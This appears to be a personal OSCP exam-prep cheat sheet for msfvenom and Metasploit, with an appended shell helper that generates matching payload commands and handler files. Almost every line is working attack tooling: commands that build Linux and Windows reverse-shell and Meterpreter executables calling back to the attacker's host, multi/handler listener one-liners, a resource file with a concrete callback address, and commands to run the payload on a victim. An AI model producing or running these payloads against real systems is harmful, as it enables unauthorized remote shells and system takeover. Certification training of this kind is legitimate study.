msfvenom

https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions
--
You may use the following against all of the target machines:
- multi handler (aka exploit/multi/handler)
- msfvenom
tmux setenv IP_LOCAL <local-ip>

linux - for OSCP

shell.elf

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f elf > shell.elf
msfconsole
msfconsole -q -x "use multi/handler; set payload linux/x64/shell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"

windows - for OSCP

shell.exe

#echo $IP_LOCAL
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-4444-powershell.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-x64-4444-cmd.exe
msfvenom -p windows/shell_reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-4444-x86-cmd.exe
msfconsole
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"
msfconsole -q -x "use multi/handler; set payload windows/x64/shell/reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"
msfconsole -q -x "use multi/handler; set payload windows/shell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"

.\shell.exe
powershell C:\shell.exe

not❗ for OSCP

Meterpreter linux - not❗ for OSCP

shell.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f elf > shell.elf
msfconsole
msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"

Meterpreter windows - not❗ for OSCP

shell.exe

echo $IP_LOCAL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-4444-meterpreter.exe
msfconsole
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"

.\shell.exe
powershell C:\shell.exe

Meterpreter start from file

create handler.rc file

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.18.9.175
set LPORT 4444
run
run listener from file
msfconsole -r handler.rc
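Added helper for the handler.rc procedure above (not part of the original notes): it derives the msfvenom command line and the matching handler.rc from one LHOST/LPORT pair and validates both values, so the port baked into the payload and the port the listener waits on cannot drift apart. The function names, the IPv4-only check and the elf/exe choice by payload family are assumptions of this example; it prints the msfvenom command rather than running it.

```shell
#!/bin/sh
# Added example: one source of truth for LHOST/LPORT shared by payload and handler.
# Assumes payload names like the ones in these notes (linux/* or windows/*).

# Validate an IPv4 address: four dotted octets, each 0-255.
valid_ip() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  old_ifs=$IFS; IFS=.
  set -- $1          # split the address into its four octets
  IFS=$old_ifs
  for o in "$@"; do [ "$o" -le 255 ] || return 1; done
}

# Validate a TCP port: numeric and within 1-65535.
valid_port() {
  echo "$1" | grep -Eq '^[0-9]{1,5}$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print (do not execute) the msfvenom command for PAYLOAD LHOST LPORT.
# Output format follows the payload family: elf for linux/*, exe for windows/*.
venom_cmd() {
  payload=$1 lhost=$2 lport=$3
  valid_ip "$lhost"   || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  case $payload in
    linux/*)   fmt=elf; out=shell.elf ;;
    windows/*) fmt=exe; out=shell.exe ;;
    *) echo "unknown payload family: $payload" >&2; return 1 ;;
  esac
  echo "msfvenom -p $payload LHOST=$lhost LPORT=$lport -f $fmt > $out"
}

# Write the multi/handler resource file for the same triple (default: handler.rc).
write_handler_rc() {
  payload=$1 lhost=$2 lport=$3 rcfile=${4:-handler.rc}
  valid_ip "$lhost" && valid_port "$lport" || return 1
  printf 'use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nrun\n' \
    "$payload" "$lhost" "$lport" > "$rcfile"
}

# Emit both artefacts from one triple, e.g.:
#   gen_pair linux/x64/shell_reverse_tcp "$IP_LOCAL" 4444
gen_pair() {
  venom_cmd "$1" "$2" "$3" && write_handler_rc "$1" "$2" "$3" "${4:-handler.rc}"
}
```

Start the listener with `msfconsole -r handler.rc` exactly as in the notes; the only difference is that both files now come from the same variables.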

  • https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/